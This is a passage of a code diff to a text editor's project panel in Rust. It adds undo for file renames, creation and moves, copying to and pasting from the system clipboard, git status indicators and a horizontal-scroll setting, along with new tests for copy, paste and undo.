{ + self.undo_manager.undo(cx); + cx.notify(); + } + fn rename_impl( &mut self, selection: Option>, @@ -2361,6 +2327,7 @@ impl ProjectPanel { let project_path = project.path_for_entry(selection.entry_id, cx)?; dirty_buffers += project.dirty_buffers(cx).any(|path| path == project_path) as usize; + Some(( selection.entry_id, project_path.path.file_name()?.to_string(), @@ -2372,6 +2339,11 @@ impl ProjectPanel { } let answer = if !skip_prompt { let operation = if trash { "Trash" } else { "Delete" }; + let message_start = if trash { + "Do you want to trash" + } else { + "Are you sure you want to permanently delete" + }; let prompt = match file_paths.first() { Some((_, path)) if file_paths.len() == 1 => { let unsaved_warning = if dirty_buffers > 0 { @@ -2380,7 +2352,7 @@ impl ProjectPanel { "" }; - format!("{operation} {path}?{unsaved_warning}") + format!("{message_start} {path}?{unsaved_warning}") } _ => { const CUTOFF_POINT: usize = 10; @@ -2412,14 +2384,20 @@ impl ProjectPanel { }; format!( - "Do you want to {} the following {} files?\n{}{unsaved_warning}", - operation.to_lowercase(), + "{message_start} the following {} files?\n{}{unsaved_warning}", file_paths.len(), names.join("\n") ) } }; - Some(window.prompt(PromptLevel::Info, &prompt, None, &[operation, "Cancel"], cx)) + let detail = (!trash).then_some("This cannot be undone."); + Some(window.prompt( + PromptLevel::Info, + &prompt, + detail, + &[operation, "Cancel"], + cx, + )) } else { None }; @@ -2988,6 +2966,7 @@ impl ProjectPanel { fn cut(&mut self, _: &Cut, _: &mut Window, cx: &mut Context) { let entries = self.disjoint_effective_entries(cx); if !entries.is_empty() { + self.write_entries_to_system_clipboard(&entries, cx); self.clipboard = Some(ClipboardEntry::Cut(entries)); cx.notify(); } @@ -2996,6 +2975,7 @@ impl ProjectPanel { fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { let entries = self.disjoint_effective_entries(cx); if !entries.is_empty() { + self.write_entries_to_system_clipboard(&entries, cx); self.clipboard = Some(ClipboardEntry::Copied(entries)); cx.notify(); } @@ -3012,16 +2992,25 @@ impl ProjectPanel { if target_entry.is_file() || (target_entry.is_dir() && target_entry.id == source.entry_id) { new_path.pop(); } - let clipboard_entry_file_name = self + + let source_worktree = self .project .read(cx) - .path_for_entry(source.entry_id, cx)? - .path - .file_name()? - .to_string(); + .worktree_for_entry(source.entry_id, cx)?; + let source_entry = source_worktree.read(cx).entry_for_id(source.entry_id)?; + + let clipboard_entry_file_name = source_entry.path.file_name()?.to_string(); new_path.push(RelPath::unix(&clipboard_entry_file_name).unwrap()); - let extension = new_path.extension().map(|s| s.to_string()); - let file_name_without_extension = new_path.file_stem()?.to_string(); + + let (extension, file_name_without_extension) = if source_entry.is_file() { + ( + new_path.extension().map(|s| s.to_string()), + new_path.file_stem()?.to_string(), + ) + } else { + (None, clipboard_entry_file_name.clone()) + }; + let file_name_len = file_name_without_extension.len(); let mut disambiguation_range = None; let mut ix = 0; @@ -3057,6 +3046,17 @@ impl ProjectPanel { } fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if let Some(external_paths) = self.external_paths_from_system_clipboard(cx) { + let target_entry_id = self + .selection + .map(|s| s.entry_id) + .or(self.state.last_worktree_root_id); + if let Some(entry_id) = target_entry_id { + self.drop_external_files(external_paths.paths(), entry_id, window, cx); + } + return; + } + maybe!({ let (worktree, entry) = self.selected_entry_handle(cx)?; let entry = entry.clone(); @@ -3067,8 +3067,15 @@ impl ProjectPanel { .filter(|clipboard| !clipboard.items().is_empty())?; enum PasteTask { - Rename(Task>), - Copy(Task>>), + Rename { + task: Task>, + old_path: ProjectPath, + new_path: ProjectPath, + }, + Copy { + task: Task>>, + destination: ProjectPath, + }, } let mut paste_tasks = Vec::new(); @@ -3078,16 +3085,22 @@ impl ProjectPanel { let (new_path, new_disambiguation_range) = self.create_paste_path(clipboard_entry, self.selected_sub_entry(cx)?, cx)?; let clip_entry_id = clipboard_entry.entry_id; + let destination: ProjectPath = (worktree_id, new_path).into(); let task = if clipboard_entries.is_cut() { + let old_path = self.project.read(cx).path_for_entry(clip_entry_id, cx)?; let task = self.project.update(cx, |project, cx| { - project.rename_entry(clip_entry_id, (worktree_id, new_path).into(), cx) + project.rename_entry(clip_entry_id, destination.clone(), cx) }); - PasteTask::Rename(task) + PasteTask::Rename { + task, + old_path, + new_path: destination, + } } else { let task = self.project.update(cx, |project, cx| { - project.copy_entry(clip_entry_id, (worktree_id, new_path).into(), cx) + project.copy_entry(clip_entry_id, destination.clone(), cx) }); - PasteTask::Copy(task) + PasteTask::Copy { task, destination } }; paste_tasks.push(task); disambiguation_range = new_disambiguation_range.or(disambiguation_range); @@ -3098,26 +3111,44 @@ impl ProjectPanel { cx.spawn_in(window, async move |project_panel, mut cx| { let mut last_succeed = None; + let mut operations = Vec::new(); + for task in paste_tasks { match task { - PasteTask::Rename(task) => { + PasteTask::Rename { + task, + old_path, + new_path, + } => { if let Some(CreatedEntry::Included(entry)) = task .await .notify_workspace_async_err(workspace.clone(), &mut cx) { + operations + .push(ProjectPanelOperation::Rename { old_path, new_path }); last_succeed = Some(entry); } } - PasteTask::Copy(task) => { + PasteTask::Copy { task, destination } => { if let Some(Some(entry)) = task .await .notify_workspace_async_err(workspace.clone(), &mut cx) { + operations.push(ProjectPanelOperation::Create { + project_path: destination, + }); last_succeed = Some(entry); } } } } + + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + // update selection if let Some(entry) = last_succeed { project_panel @@ -3404,8 +3435,7 @@ impl ProjectPanel { _: &mut Window, cx: &mut Context, ) { - if let Some((worktree, entry)) = self.selected_sub_entry(cx) { - let path = worktree.read(cx).absolutize(&entry.path); + if let Some(path) = self.reveal_in_file_manager_path(cx) { self.project .update(cx, |project, cx| project.reveal_path(&path, cx)); } @@ -3762,6 +3792,65 @@ impl ProjectPanel { } Some((worktree, entry)) } + + fn reveal_in_file_manager_path(&self, cx: &App) -> Option { + if let Some((worktree, entry)) = self.selected_sub_entry(cx) { + return Some(worktree.read(cx).absolutize(&entry.path)); + } + + let root_entry_id = self.state.last_worktree_root_id?; + let project = self.project.read(cx); + let worktree = project.worktree_for_entry(root_entry_id, cx)?; + let worktree = worktree.read(cx); + let root_entry = worktree.entry_for_id(root_entry_id)?; + Some(worktree.absolutize(&root_entry.path)) + } + + fn write_entries_to_system_clipboard(&self, entries: &BTreeSet, cx: &mut App) { + let project = self.project.read(cx); + let paths: Vec = entries + .iter() + .filter_map(|entry| { + let worktree = project.worktree_for_id(entry.worktree_id, cx)?; + let worktree = worktree.read(cx); + let worktree_entry = worktree.entry_for_id(entry.entry_id)?; + Some( + worktree + .abs_path() + .join(worktree_entry.path.as_std_path()) + .to_string_lossy() + .to_string(), + ) + }) + .collect(); + if !paths.is_empty() { + cx.write_to_clipboard(ClipboardItem::new_string(paths.join("\n"))); + } + } + + fn external_paths_from_system_clipboard(&self, cx: &App) -> Option { + let clipboard_item = cx.read_from_clipboard()?; + for entry in clipboard_item.entries() { + if let GpuiClipboardEntry::ExternalPaths(paths) = entry { + if !paths.paths().is_empty() { + return Some(paths.clone()); + } + } + } + None + } + + fn has_pasteable_content(&self, cx: &App) -> bool { + if self + .clipboard + .as_ref() + .is_some_and(|c| !c.items().is_empty()) + { + return true; + } + self.external_paths_from_system_clipboard(cx).is_some() + } + fn selected_entry_handle<'a>( &self, cx: &'a App, @@ -4248,20 +4337,36 @@ impl ProjectPanel { return Ok(()); } - let task = worktree.update(cx, |worktree, cx| { - worktree.copy_external_entries(target_directory, paths, fs, cx) + let (worktree_id, task) = worktree.update(cx, |worktree, cx| { + ( + worktree.id(), + worktree.copy_external_entries(target_directory, paths, fs, cx), + ) }); let opened_entries: Vec<_> = task .await .with_context(|| "failed to copy external paths")?; - this.update(cx, |this, cx| { + this.update_in(cx, |this, window, cx| { + let mut did_open = false; if open_file_after_drop && !opened_entries.is_empty() { let settings = ProjectPanelSettings::get_global(cx); if settings.auto_open.should_open_on_drop() { this.open_entry(opened_entries[0], true, false, cx); + did_open = true; } } + + if !did_open { + let new_selection = opened_entries + .last() + .map(|&entry_id| (worktree_id, entry_id)); + for &entry_id in &opened_entries { + this.expand_entry(worktree_id, entry_id, cx); + } + this.marked_entries.clear(); + this.update_visible_entries(new_selection, false, false, window, cx); + } }) } .log_err() @@ -4340,9 +4445,13 @@ impl ProjectPanel { cx.spawn_in(window, async move |project_panel, cx| { let mut last_succeed = None; + let mut operations = Vec::new(); for task in copy_tasks.into_iter() { if let Some(Some(entry)) = task.await.log_err() { last_succeed = Some(entry.id); + operations.push(ProjectPanelOperation::Create { + project_path: (worktree_id, entry.path).into(), + }); } } // update selection @@ -4354,6 +4463,8 @@ impl ProjectPanel { entry_id, }); + project_panel.undo_manager.record_batch(operations); + // if only one entry was dragged and it was disambiguated, open the rename editor if item_count == 1 && disambiguation_range.is_some() { project_panel.rename_impl(disambiguation_range, window, cx); @@ -4403,6 +4514,23 @@ impl ProjectPanel { (info, folded_entries) }; + // Capture old paths before moving so we can record undo operations. + let old_paths: HashMap = { + let project = self.project.read(cx); + entries + .iter() + .filter_map(|entry| { + let path = project.path_for_entry(entry.entry_id, cx)?; + Some((entry.entry_id, path)) + }) + .collect() + }; + let destination_worktree_id = self + .project + .read(cx) + .worktree_for_entry(target_entry_id, cx) + .map(|wt| wt.read(cx).id()); + // Collect move tasks paired with their source entry ID so we can correlate // results with folded selections that need refreshing. let mut move_tasks: Vec<(ProjectEntryId, Task>)> = Vec::new(); @@ -4416,16 +4544,50 @@ impl ProjectPanel { return; } + let workspace = self.workspace.clone(); if folded_selection_info.is_empty() { - for (_, task) in move_tasks { - task.detach_and_log_err(cx); - } + cx.spawn_in(window, async move |project_panel, mut cx| { + let mut operations = Vec::new(); + for (entry_id, task) in move_tasks { + if let Some(CreatedEntry::Included(new_entry)) = task + .await + .notify_workspace_async_err(workspace.clone(), &mut cx) + { + if let (Some(old_path), Some(worktree_id)) = + (old_paths.get(&entry_id), destination_worktree_id) + { + operations.push(ProjectPanelOperation::Rename { + old_path: old_path.clone(), + new_path: (worktree_id, new_entry.path).into(), + }); + } + } + } + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + }) + .detach(); } else { - cx.spawn_in(window, async move |project_panel, cx| { + cx.spawn_in(window, async move |project_panel, mut cx| { // Await all move tasks and collect successful results let mut move_results: Vec<(ProjectEntryId, Entry)> = Vec::new(); + let mut operations = Vec::new(); for (entry_id, task) in move_tasks { - if let Some(CreatedEntry::Included(new_entry)) = task.await.log_err() { + if let Some(CreatedEntry::Included(new_entry)) = task + .await + .notify_workspace_async_err(workspace.clone(), &mut cx) + { + if let (Some(old_path), Some(worktree_id)) = + (old_paths.get(&entry_id), destination_worktree_id) + { + operations.push(ProjectPanelOperation::Rename { + old_path: old_path.clone(), + new_path: (worktree_id, new_entry.path.clone()).into(), + }); + } move_results.push((entry_id, new_entry)); } } @@ -4434,6 +4596,12 @@ impl ProjectPanel { return; } + project_panel + .update(cx, |this, _| { + this.undo_manager.record_batch(operations); + }) + .ok(); + // For folded selections, we need to refresh the leaf paths (with suffixes) // because they may not be indexed yet after the parent directory was moved. // First collect the paths to refresh, then refresh them. @@ -5189,6 +5357,10 @@ impl ProjectPanel { false } }; + let git_indicator = settings + .git_status_indicator + .then(|| git_status_indicator(details.git_status)) + .flatten(); let id: ElementId = if is_sticky { SharedString::from(format!("project_panel_sticky_item_{}", entry_id.to_usize())).into() @@ -5533,7 +5705,9 @@ impl ProjectPanel { }) .selectable(false) .when( - canonical_path.is_some() || diagnostic_count.is_some(), + canonical_path.is_some() + || diagnostic_count.is_some() + || git_indicator.is_some(), |this| { let symlink_element = canonical_path.map(|path| { div() @@ -5576,6 +5750,20 @@ impl ProjectPanel { }, ) }) + .when_some(git_indicator, |this, (label, color)| { + let git_indicator = if kind.is_dir() { + Indicator::dot() + .color(Color::Custom(color.color(cx).opacity(0.5))) + .into_any_element() + } else { + Label::new(label) + .size(LabelSize::Small) + .color(color) + .into_any_element() + }; + + this.child(git_indicator) + }) .when_some(symlink_element, |this, el| this.child(el)) .into_any_element(), ) @@ -6310,6 +6498,7 @@ impl Render for ProjectPanel { let panel_settings = ProjectPanelSettings::get_global(cx); let indent_size = panel_settings.indent_size; let show_indent_guides = panel_settings.indent_guides.show == ShowIndentGuides::Always; + let horizontal_scroll = panel_settings.scrollbar.horizontal_scroll; let show_sticky_entries = { if panel_settings.sticky_scroll { let is_scrollable = self.scroll_handle.is_scrollable(); @@ -6445,6 +6634,9 @@ impl Render for ProjectPanel { .on_action(cx.listener(Self::fold_directory)) .on_action(cx.listener(Self::remove_from_project)) .on_action(cx.listener(Self::compare_marked_files)) + .when(cx.has_flag::(), |el| { + el.on_action(cx.listener(Self::undo)) + }) .when(!project.is_read_only(cx), |el| { el.on_action(cx.listener(Self::new_file)) .on_action(cx.listener(Self::new_directory)) @@ -6459,11 +6651,14 @@ impl Render for ProjectPanel { el.on_action(cx.listener(Self::trash)) }) }) - .when(project.is_local(), |el| { - el.on_action(cx.listener(Self::reveal_in_finder)) - .on_action(cx.listener(Self::open_system)) - .on_action(cx.listener(Self::open_in_terminal)) - }) + .when( + project.is_local() || project.is_via_wsl_with_host_interop(cx), + |el| { + el.on_action(cx.listener(Self::reveal_in_finder)) + .on_action(cx.listener(Self::open_system)) + .on_action(cx.listener(Self::open_in_terminal)) + }, + ) .when(project.is_via_remote_server(), |el| { el.on_action(cx.listener(Self::open_in_terminal)) .on_action(cx.listener(Self::download_from_remote)) @@ -6679,10 +6874,14 @@ impl Render for ProjectPanel { }) }) .with_sizing_behavior(ListSizingBehavior::Infer) - .with_horizontal_sizing_behavior( - ListHorizontalSizingBehavior::Unconstrained, - ) - .with_width_from_item(self.state.max_width_item_index) + .with_horizontal_sizing_behavior(if horizontal_scroll { + ListHorizontalSizingBehavior::Unconstrained + } else { + ListHorizontalSizingBehavior::FitList + }) + .when(horizontal_scroll, |list| { + list.with_width_from_item(self.state.max_width_item_index) + }) .track_scroll(&self.scroll_handle), ) .child( @@ -6690,6 +6889,24 @@ impl Render for ProjectPanel { .id("project-panel-blank-area") .block_mouse_except_scroll() .flex_grow() + .on_scroll_wheel({ + let scroll_handle = self.scroll_handle.clone(); + let entity_id = cx.entity().entity_id(); + move |event, window, cx| { + let state = scroll_handle.0.borrow(); + let base_handle = &state.base_handle; + let current_offset = base_handle.offset(); + let max_offset = base_handle.max_offset(); + let delta = event.delta.pixel_delta(window.line_height()); + let new_offset = (current_offset + delta) + .clamp(&max_offset.neg(), &Point::default()); + + if new_offset != current_offset { + base_handle.set_offset(new_offset); + cx.notify(entity_id); + } + } + }) .when( self.drag_target_entry.as_ref().is_some_and( |entry| match entry { @@ -6825,13 +7042,18 @@ impl Render for ProjectPanel { .size_full(), ) .custom_scrollbars( - Scrollbars::for_settings::() - .tracked_scroll_handle(&self.scroll_handle) - .with_track_along( - ScrollAxes::Horizontal, - cx.theme().colors().panel_background, - ) - .notify_content(), + { + let mut scrollbars = + Scrollbars::for_settings::() + .tracked_scroll_handle(&self.scroll_handle); + if horizontal_scroll { + scrollbars = scrollbars.with_track_along( + ScrollAxes::Horizontal, + cx.theme().colors().panel_background, + ); + } + scrollbars.notify_content() + }, window, cx, ) @@ -6859,14 +7081,17 @@ impl Render for ProjectPanel { Button::new("open_project", "Open Project") .full_width() .key_binding(KeyBinding::for_action_in( - &workspace::Open, + &workspace::Open::default(), &focus_handle, cx, )) .on_click(cx.listener(|this, _, window, cx| { this.workspace .update(cx, |_, cx| { - window.dispatch_action(workspace::Open.boxed_clone(), cx); + window.dispatch_action( + workspace::Open::default().boxed_clone(), + cx, + ); }) .log_err(); })), @@ -6903,7 +7128,7 @@ impl Render for ProjectPanel { .workspace .update(cx, |workspace, cx| { workspace.open_workspace_for_paths( - true, + OpenMode::Activate, external_paths.paths().to_owned(), window, cx, @@ -6980,17 +7205,8 @@ impl Panel for ProjectPanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| ProjectPanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, window: &mut Window, cx: &mut Context) { - self.width = size; - cx.notify(); - cx.defer_in(window, |this, _, cx| { - this.serialize(cx); - }); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + ProjectPanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -7029,7 +7245,7 @@ impl Panel for ProjectPanel { } fn activation_priority(&self) -> u32 { - 0 + 1 } } @@ -7096,5 +7312,30 @@ pub fn par_sort_worktree_entries_with_mode( entries.par_sort_by(|lhs, rhs| cmp_with_mode(lhs, rhs, &mode)); } +fn git_status_indicator(git_status: GitSummary) -> Option<(&'static str, Color)> { + if git_status.conflict > 0 { + return Some(("!", Color::Conflict)); + } + if git_status.untracked > 0 { + return Some(("U", Color::Created)); + } + if git_status.worktree.deleted > 0 { + return Some(("D", Color::Deleted)); + } + if git_status.worktree.modified > 0 { + return Some(("M", Color::Warning)); + } + if git_status.index.deleted > 0 { + return Some(("D", Color::Deleted)); + } + if git_status.index.modified > 0 { + return Some(("M", Color::Modified)); + } + if git_status.index.added > 0 { + return Some(("A", Color::Created)); + } + None +} + #[cfg(test)] mod project_panel_tests; diff --git a/crates/project_panel/src/project_panel_settings.rs b/crates/project_panel/src/project_panel_settings.rs index 0d703c55c06dfff2976fe59f6e030ad9eb1d758b..64f3ea42928399201c497ba58041ed0bf6ed5ba1 100644 --- a/crates/project_panel/src/project_panel_settings.rs +++ b/crates/project_panel/src/project_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::Pixels; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -36,6 +36,7 @@ pub struct ProjectPanelSettings { pub auto_open: AutoOpenSettings, pub sort_mode: ProjectPanelSortMode, pub diagnostic_badges: bool, + pub git_status_indicator: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -49,6 +50,11 @@ pub struct ScrollbarSettings { /// /// Default: inherits editor scrollbar settings pub show: Option, + /// Whether to allow horizontal scrolling in the project panel. + /// When false, the view is locked to the leftmost position and long file names are clipped. + /// + /// Default: true + pub horizontal_scroll: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -75,9 +81,13 @@ impl AutoOpenSettings { } } -impl ScrollbarVisibility for ProjectPanelSettings { +#[derive(Default)] +pub(crate) struct ProjectPanelScrollbarProxy; + +impl ScrollbarVisibility for ProjectPanelScrollbarProxy { fn visibility(&self, cx: &ui::App) -> ShowScrollbar { - self.scrollbar + ProjectPanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -111,8 +121,12 @@ impl Settings for ProjectPanelSettings { auto_fold_dirs: project_panel.auto_fold_dirs.unwrap(), bold_folder_labels: project_panel.bold_folder_labels.unwrap(), starts_open: project_panel.starts_open.unwrap(), - scrollbar: ScrollbarSettings { - show: project_panel.scrollbar.unwrap().show.map(Into::into), + scrollbar: { + let scrollbar = project_panel.scrollbar.unwrap(); + ScrollbarSettings { + show: scrollbar.show.map(ui_scrollbar_settings_from_raw), + horizontal_scroll: scrollbar.horizontal_scroll.unwrap(), + } }, show_diagnostics: project_panel.show_diagnostics.unwrap(), hide_root: project_panel.hide_root.unwrap(), @@ -128,6 +142,7 @@ impl Settings for ProjectPanelSettings { }, sort_mode: project_panel.sort_mode.unwrap(), diagnostic_badges: project_panel.diagnostic_badges.unwrap(), + git_status_indicator: project_panel.git_status_indicator.unwrap(), } } } diff --git a/crates/project_panel/src/project_panel_tests.rs b/crates/project_panel/src/project_panel_tests.rs index af84a7f522a60abf2608bf1f3435b367d24f6bdc..55b53cde8b6252f8b9732cf4effc35ea53c073e0 100644 --- a/crates/project_panel/src/project_panel_tests.rs +++ b/crates/project_panel/src/project_panel_tests.rs @@ -4,7 +4,7 @@ use editor::MultiBufferOffset; use gpui::{Empty, Entity, TestAppContext, VisualTestContext}; use menu::Cancel; use pretty_assertions::assert_eq; -use project::FakeFs; +use project::{FakeFs, ProjectPath}; use serde_json::json; use settings::{ProjectPanelAutoOpenSettings, SettingsStore}; use std::path::{Path, PathBuf}; @@ -1635,7 +1635,10 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { "four.txt": "", } }, - "b": {} + "b": {}, + "d.1.20": { + "default.conf": "", + } }), ) .await; @@ -1688,6 +1691,7 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " three.txt", " one.txt", " two.txt", + " > d.1.20", ] ); @@ -1709,7 +1713,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " four.txt", " three.txt", " one.txt", - " two.txt" + " two.txt", + " > d.1.20", ] ); @@ -1732,7 +1737,8 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " four.txt", " three.txt", " one.txt", - " two.txt" + " two.txt", + " > d.1.20", ] ); @@ -1760,30 +1766,812 @@ async fn test_copy_paste_directory(cx: &mut gpui::TestAppContext) { " > inner_dir", " one.txt", " two.txt", + " > d.1.20", + ] + ); + + select_path(&panel, "root/d.1.20", cx); + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + assert_eq!( + visible_entries_as_strings(&panel, 0..50, cx), + &[ + // + "v root", + " > a", + " v b", + " v a", + " v inner_dir", + " four.txt", + " three.txt", + " one.txt", + " two.txt", + " v c", + " > a", + " > inner_dir", + " one.txt", + " two.txt", + " v d.1.20", + " default.conf", + " > [EDITOR: 'd.1.20 copy'] <== selected", + ], + "Dotted directory names should not be split at the dot when disambiguating" + ); +} + +#[gpui::test] +async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/test", + json!({ + "dir1": { + "a.txt": "", + "b.txt": "", + }, + "dir2": {}, + "c.txt": "", + "d.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "test/dir1", cx); + + cx.simulate_modifiers_change(gpui::Modifiers { + control: true, + ..Default::default() + }); + + select_path_with_mark(&panel, "test/dir1", cx); + select_path_with_mark(&panel, "test/c.txt", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " > dir2", + " c.txt <== selected <== marked", + " d.txt", + ], + "Initial state before copying dir1 and c.txt" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + }); + select_path(&panel, "test/dir2", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + toggle_expand_dir(&panel, "test/dir2/dir1", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " v dir2", + " v dir1 <== selected", + " a.txt", + " b.txt", + " c.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 as well as c.txt into dir2" + ); + + // Disambiguating multiple files should not open the rename editor. + select_path(&panel, "test/dir2", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt", + " b.txt", + " v dir2", + " v dir1", + " a.txt", + " b.txt", + " > dir1 copy <== selected", + " c.txt", + " c copy.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor" + ); +} + +#[gpui::test] +async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/test", + json!({ + "dir1": { + "a.txt": "", + "b.txt": "", + }, + "dir2": {}, + "c.txt": "", + "d.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + toggle_expand_dir(&panel, "test/dir1", cx); + + cx.simulate_modifiers_change(gpui::Modifiers { + control: true, + ..Default::default() + }); + + select_path_with_mark(&panel, "test/dir1/a.txt", cx); + select_path_with_mark(&panel, "test/dir1", cx); + select_path_with_mark(&panel, "test/c.txt", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..15, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt <== marked", + " b.txt", + " > dir2", + " c.txt <== selected <== marked", + " d.txt", + ], + "Initial state before copying a.txt, dir1 and c.txt" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.copy(&Default::default(), window, cx); + }); + select_path(&panel, "test/dir2", cx); + panel.update_in(cx, |panel, window, cx| { + panel.paste(&Default::default(), window, cx); + }); + cx.executor().run_until_parked(); + + toggle_expand_dir(&panel, "test/dir2/dir1", cx); + + assert_eq!( + visible_entries_as_strings(&panel, 0..20, cx), + &[ + "v test", + " v dir1 <== marked", + " a.txt <== marked", + " b.txt", + " v dir2", + " v dir1 <== selected", + " a.txt", + " b.txt", + " c.txt", + " c.txt <== marked", + " d.txt", + ], + "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1." + ); +} + +#[gpui::test] +async fn test_undo_rename(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "a.txt": "", + "b.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root/a.txt", cx); + panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx)); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("renamed.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/renamed.txt", cx).is_some(), + "File should be renamed to renamed.txt" + ); + assert_eq!( + find_project_entry(&panel, "root/a.txt", cx), + None, + "Original file should no longer exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/a.txt", cx).is_some(), + "File should be restored to original name after undo" + ); + assert_eq!( + find_project_entry(&panel, "root/renamed.txt", cx), + None, + "Renamed file should no longer exist after undo" + ); +} + +#[gpui::test] +async fn test_undo_create_file(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "existing.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx)); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| editor.set_text("new.txt", window, cx)); + panel.confirm_edit(true, window, cx).unwrap() + }); + confirm.await.unwrap(); + cx.run_until_parked(); + + assert!( + find_project_entry(&panel, "root/new.txt", cx).is_some(), + "New file should exist" + ); + + panel.update_in(cx, |panel, window, cx| { + panel.undo(&Undo, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + find_project_entry(&panel, "root/new.txt", cx), + None, + "New file should be removed after undo" + ); + assert!( + find_project_entry(&panel, "root/existing.txt", cx).is_some(), + "Existing file should still be present" + ); +} + +#[gpui::test] +async fn test_undo_create_directory(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + "/root", + json!({ + "existing.txt": "", + }), + ) + .await; + + let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await; + let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window.into(), cx); + let panel = workspace.update_in(cx, ProjectPanel::new); + cx.run_until_parked(); + + select_path(&panel, "root", cx); + panel.update_in(cx, |panel, window, cx| { + panel.new_directory(&NewDirectory, window, cx) + }); + cx.run_until_parked(); + + let confirm = panel.update_in(cx, |panel, window, cx| { + panel + .filename_editor + .update(cx, |editor, cx| 